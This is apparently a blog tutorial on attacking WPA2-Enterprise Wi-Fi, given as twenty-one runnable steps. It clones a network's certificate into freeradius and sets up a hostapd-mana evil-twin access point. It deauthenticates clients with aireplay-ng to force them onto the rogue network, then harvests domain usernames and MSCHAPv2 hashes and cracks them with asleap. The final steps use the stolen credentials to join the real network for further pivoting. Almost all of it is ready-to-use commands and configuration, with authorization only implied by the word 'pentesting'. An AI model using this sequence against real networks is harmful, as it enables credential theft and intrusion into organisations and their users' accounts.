WPA2-Enterprise Wireless Pentesting

There are multiple variations of WPA-2 Enterprise. In this case, the focus is on the tool. This post is about using hostapd-mana and freeradius to create a evil twin network then stealing client credentials

Step 1) Have a wireless card that you can set to monitor mode, then run the commands below:

sudo iw dev wlan0 interface add wlan0mon type monitor

sudo ip link set wlan0mon up

Step 2) Then run airodump-ng to gather details about the WiFi network. Obtain the required details below.

sudo airodump-ng wlan0mon

1. BSSID –
2. Channel –
3. ESSID –

Step 3) Stop the process, then run airodump-ng again to gather specific information and Station information. See “Troubleshooting Steps” if no Stations appear.

sudo airodump-ng wlan0mon -c <channel> --bssid <BSSID from Step 2>

1. Station –

Step 4) Stop the process, then run airodump-ng again to output the captured traffic to PCAP

sudo airodump-ng -c <channel> --bssid <BSSID from Step 2> -w out wlan0mon

Step 5) Launch another terminal and deauthenticate client, to sniff cert used during authentication

sudo aireplay-ng -0 20 -b <BSSID from Step 2> -h <Station from Step 3> wlan0mon

Step 6) Stop airodump-ng and aireplay-ng, then inspect the PCAP file with Wireshark

sudo wireshark out-01.cap &

Step 7) In Wireshark, use the filter “tls.handshake.certificate”.

Zoom in to the Packet Details > TLSv1 Record Layer > Handshake Protocol > Certificates > Certificate

Right click “Certificate: <super long hex string>” then click Export as Bytes and name it as certificate.der

Step 8) Use openssl to obtain information about the certificate, with special focus on the “Issuer:” section

openssl x509 -inform der -in certificate.der -text

C = countryName

ST = stateOrProvinceName

L = localityName

O = organizationName

emailAddress = self explanatory

CN = commonName

Step 9) Change to root

sudo -s

Step 10) Modify freeradius certificate config

nano /etc/freeradius/3.0/certs/ca.cnf

1. Search for, or scroll down to [certificate_authority] section
2. Modify the countryName, stateOrProvinceName, localityName, organizationName, emailAddress and commonName to the same content as Step 8
3. Note that commonName should be encapsulated in ” “

Step 11) Modify freeradius server config

nano /etc/freeradius/3.0/certs/server.cnf

1. Search for, or scroll down to [server] section
2. Modify the countryName, stateOrProvinceName, localityName, organizationName, emailAddress and commonName to the same content as Step 8
3. Note that commonName should be encapsulated in ” “

Step 12) Create certificate in freeradius by navigating to certs folder, then execute make command

cd /etc/freeradius/3.0/certs

make

Step 13) Create a hostapd-mana eap user config file with the content after the nano command:

nano /etc/hostapd-mana/mana.eap_user

* PEAP,TTLS,TLS,FAST
“t” TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 “pass” [2]

Step 14) Create a hostapd-mana config file with the content after the nano command:

nano /etc/hostapd-mana/mana.conf

#Wireless information

ssid=<ESSID from Step 2>

interface=wlan0

driver=nl80211

channel=<channel from Step 2>

hw_mode=g

#EAP information

ieee8021x=1

eap_server=1

eapol_key_index_workaround=0

eap_user_file=/etc/hostapd-mana/mana.eap_user

#Certificate information

ca_cert=/etc/freeradius/3.0/certs/ca.pem

server_cert=/etc/freeradius/3.0/certs/server.pem

private_key=/etc/freeradius/3.0/certs/server.key

#Setting nonsensical password to the private key

private_key_password=12345678

dh_file=/etc/freeradius/3.0/certs/dh

#Setting some WPA details

auth_algs=1

wpa=2

wpa_key_mgmt=WPA-EAP

wpa_pairwise=CCMP TKIP

#Setting mana config

mana_wpe=1

mana_credout=/tmp/hostapd.credout

mana_eapsuccess=1

mana_eaptls=1

Step 15) Start hostapd-mana

hostapd-mana /etc/hostapd-mana/mana.conf

Step 16) If required, deauthenticate clients from their networks to trick them into joining your rogue network

sudo aireplay-ng -0 5 -b <BSSID from Step 2> wlan0mon

Step 17) Inspect hostapd-mana output, there should be domain\username, and encrypted passwords in ASLEAP, JTR and HASHCAT output.

For simplicity, launch a new terminal, then use ASLEAP to crack passwords, as the whole command is provided from hostapd-mana

sudo asleap -C <first portion> -R <second portion> -W /usr/share/john/password.lst

Step 18) Create a wpa_supplicant config file to be used in step 19:

nano wpa2enterprise.conf

network={

ssid=”INPUT_ESSID_FROM_STEP_2″

scan_ssid=1

key_mgmt=WPA-EAP

identity=”domain\username_FROM_STEP_17″

password=”password_FROM_STEP_17″

eap=PEAP

phase1=”peaplabel=0″

phase2=”auth=MSCHAPV2″

}

Step 19) Connect to the WPA2-Enterprise network using wpa_supplicant

sudo wpa_supplicant -B -i wlan0 -c wpa2enterprise.conf

Step 20) Obtain IP address from the wireless router

sudo dhclient -v wlan0

Step 21) Perform further pivoting / attacks, then disconnect from the network

sudo killall wpa_supplicant